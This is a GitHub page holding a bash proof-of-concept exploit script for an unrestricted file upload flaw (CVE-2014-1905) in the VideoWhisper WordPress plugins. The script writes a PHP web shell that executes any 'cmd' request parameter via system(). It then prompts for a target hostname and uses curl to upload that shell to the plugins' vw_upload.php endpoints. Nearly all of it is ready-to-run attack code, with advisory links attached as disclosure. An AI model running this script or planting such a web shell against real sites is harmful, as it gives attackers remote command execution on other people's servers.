-
Notifications
You must be signed in to change notification settings - Fork 72
/
videowhisper_poc.sh
54 lines (51 loc) · 1.65 KB
/
videowhisper_poc.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/bin/bash
#A quick Exploit for the VideoWhisper file upload incomplete fix I posted a few weeks ago.
#v1.0
cat > shell.pht << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
echo "<pre>";
\$cmd = (\$_REQUEST[‘cmd’]);
system(\$cmd);
echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-
red='\033[0;31m'
NC='\033[0m' # No Color
while [ true ]; do
echo -e ${red};
echo -e " VideoWhisper Remote File Upload PoC Redux $NC";
echo " 4/14/2015";
echo " Larry W. Cashdollar, @_larry0";
echo
echo
echo "Linux OSs like Debian or Ubuntu have .phtml, .pht defined as";
echo "SetHandler application/x-httpd-php in php5.conf";
echo "So WP instances hosted on thos OSs are still vulnerable to CVE-2014-1905";
echo "and bid 53851.";
echo " - Advisories -";
echo "http://www.vapid.dhs.org/blog/04-16-2015/";
echo "http://www.vapid.dhs.org/advisory.php?v=116";
echo "http://www.vapid.dhs.org/advisory.php?v=117";
echo
echo
echo "Ctrl ^C to exit";
echo -n "Enter Target Hostname :";
read target;
echo -n "Enter 1 for integration 2 for presentation :";
read plugin;
echo -n "Enter payload filename or (shell.pht):";
read file;
echo "[+] Hostname $target";
echo "[+] File $file";
if [ $plugin == 1 ]; then
echo "[+] Targeting Video Conference Plugin";
echo
curl --form "vw_file=@$file" --form "name=$file" --form "room=./" http://$target/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php
else
echo "[+] Targeting Video Presentation Plugin";
echo
curl --form "vw_file=@$file" --form "name=$file" --form "room=./" http://$target/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php
fi;
done